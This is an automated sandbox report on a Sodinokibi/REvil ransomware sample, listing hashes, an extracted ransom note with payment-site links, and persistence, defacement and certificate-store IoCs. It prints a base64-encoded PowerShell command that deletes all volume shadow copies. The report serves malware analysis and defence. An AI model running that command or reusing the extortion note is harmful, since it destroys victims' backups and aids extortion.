sodinokibi | 8efde1792c83d66d2bf46cdfc695bb5f70edeefd951b70c403960ebcf2ca712c

General

Target

0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
Size

164KB
MD5

0e3a73d5941bbe2e577bbf9910e422da
SHA1

9a82c12a54cdf85063ebfe9eb97444f49aa68f51
SHA256

8efde1792c83d66d2bf46cdfc695bb5f70edeefd951b70c403960ebcf2ca712c
SHA512

7780e7b1aee337c2d9440ac6f9997cad698cf633118872edd3daa565a8de5330350f2a61cb0b35889e518871c840075f68b39e9c92624783bc7cbb8f88a49ecd
SSDEEP

3072:WGYFrOdhfkQv9jrAprhFmyvEjQDKaUznxQacKt1Cilb:QadFkMGhFjED39b

Score

10^/10

sodinokibi persistence ransomware

Malware Config

Extracted

Path

C:\Recovery\b198b300-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension b198b300. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/721F9F5999A7D493 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/721F9F5999A7D493 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: kFPskfsOGbbLn1qGBw3r/uH6XqEl0uPd8KJ7h6M1Gfhv2ktH7kJUEbmQCEOItER3 QTZfYiWQ6VFTTY0bPJZcIzoqYsHly7CUuZd53mYz3JyIFIrooTPUP9ZIwVujo8eX a0LgKAGtovxNy5YYhu7s1N9TgZ4ZE+5QF3OwhbXqPnm+/sDzPakF6byyru+7u7oj DLE3+BMpqb80Sk790Orsy8fhiZeUH7O6U9ij2uYXZRkst+B0Uz/nMo3T2N70IaLH rY3OHAaRDki2uYs58pni6rY/a6ohMGgjBTeIqfd2J9QQlVhMhv0AS1XtOH8nqq2M Oe3wSYhqk4et7Hr5X7RhWWR2nOKC7thuQmUZMoMEr+cc25GAvv8MaIS1TSJ3s63A iDSa+uJb1DNQMHd2u//WJck6TvIeCnjRS/CwtkNUqls6PFqWgWt4Hr1wYBskqJya ozRZYVVm1zDBHmm7dXokwbSpvWwiKBGg2JXaLxfijL4Ke3gQZGBqwd8mFeWC0+fX 9EgrV+PeUwlkECmkx9zmzwBW9D7fq+baD/toqk9/H2LHkczHoAnIbwuSVfIvvHB2 9tgk3X4KBoTHwkUp1Xzp2oLiULlzCp3zIeF4dFJW+B9JW6hihYt7BneVBSWKm2IV XvnM4oV5R+XrlJd77aTOEPSUSjcau0AqOW4uFjWQ8zQObPiM9YsYrmR9ZbpOhoI0 G3UmacGiiaBdWMQ4+aZumo5OTuPkEZw5Pr72jeldFs4h7bOqnFEjrSUGZtbX9+5Y GONcuj5bPO1YkWDmvjEz1zhpSbVF1ofwVpbOnVVBQzDOuaPMBCWxabg02twNhYu5 Zm640upNo9ZIg9zbNImNVXCHk+GKsy47ZMJwuw5spd5biyWX1MUkwcZ/e0kRhHwv EPijOBxuCDp173UZEGWYDaoJBzJzdMNELnv84y413SCDwBB8ma2fXG5+Vu6voezo 73Zgl/EqNTsRz8qBYxchHhmKQZKvpEtO0bB+TdL3hTa7kMZI3qE1pU9MNtfCgKqq zkwz26OARxTagWbW3RwDtWOHQaf1JVSMty5SgOfKZrMKUUXtQu6l+bMEM5tC3WcD JsYfgxkNPex5MOX0nPt61oZY41iQjzhavtbWD/ZZBRF6OcUsU3YfLa1Ot2PpJhqN BPNw+GCflvogAOZvAQ9trWlT+KpmnWm4lBM+mn86K4mk1CozmmK42hKLB2jkDN7H dBsirgRb5hGc5ifOFmL0OA== Extension name: b198b300 -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/721F9F5999A7D493

http://decryptor.top/721F9F5999A7D493

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\sNpEShi30R = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe"	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\A:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\I:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\P:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\G:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\M:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\T:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\B:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\H:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\U:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\N:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\O:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\S:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\D:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\K:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\Y:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\F:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\R:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\V:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\W:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\X:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\Z:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\E:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\J:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened (read-only)	\??\L:	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\68us50.bmp"	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe

Drops file in Program Files directory 29 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\SetExport.mp3	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\MeasureSend.wdp	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RevokeSuspend.crw	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SetCompress.vssm	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SkipClose.ttc	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\b198b300-readme.txt	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\BlockOut.pptx	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DismountRead.ttf	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ConnectSend.svgz	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AddRead.xml	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AssertTest.wm	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ConfirmMerge.vsw	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ShowUnprotect.jpeg	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File created	\??\c:\program files (x86)\b198b300-readme.txt	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AssertUninstall.csv	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RegisterRequest.ppsm	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RepairStep.vsdm	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\b198b300-readme.txt	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CompressInitialize.wdp	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\OutExit.ico	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UndoUninstall.zip	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\PopGet.rtf	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ReceivePop.DVR-MS	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RenameSkip.pcx	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UndoAdd.jpeg	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File created	\??\c:\program files\b198b300-readme.txt	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DebugUnpublish.iso	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SwitchExit.xlsb	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\b198b300-readme.txt	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000020000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2620	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
1804	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeBackupPrivilege	2748	vssvc.exe
Token: SeRestorePrivilege	2748	vssvc.exe
Token: SeAuditPrivilege	2748	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2620 wrote to memory of 1804	2620	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe	28
PID 2620 wrote to memory of 1804	2620	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe	28
PID 2620 wrote to memory of 1804	2620	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe	28
PID 2620 wrote to memory of 1804	2620	0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe	28

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0e3a73d5941bbe2e577bbf9910e422da_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1804

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1696

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

3

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\b198b300-readme.txt

Filesize
6KB

MD5
f63edc975462b8c6358db36aaf654dbb

SHA1
461b37d0329a472cc07ebdabce3d62868e858621

SHA256
671eb10b5d10404ef9b11a17ed92ee1947ab531775e696ad1f25e006473b8f68

SHA512
b4e4a3e699844f6f5abe3b96b5b6145067f4d9a03af338b64eef9ef50339ad73be132953bcb7aab262aff4d1f9332d90f7d1090bbeebd48d67d5988a3eada5c4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3017.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3127.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Windows\System32\catroot2\dberr.txt

Filesize
192KB

MD5
7db76d6793db6ff6ee514ec1572bb6da

SHA1
57a5a036809865c9fd424e011228b52a4874482d

SHA256
5bfc1af10feb85351c16dbc1e7f03b829c4006e0ffc8a5b208447d7ef355b4e7

SHA512
4221a2c0f0a14c7a6d99a91bd36e359c2290c82f3bf5fb73e067472c98784b6721513e44070ed10b55bcd7ff85b19055642c4528b9179800b8eba2990af6da37

Download Submit
memory/1804-4-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

Filesize
4KB

Download
memory/1804-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1804-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/1804-7-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-10-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads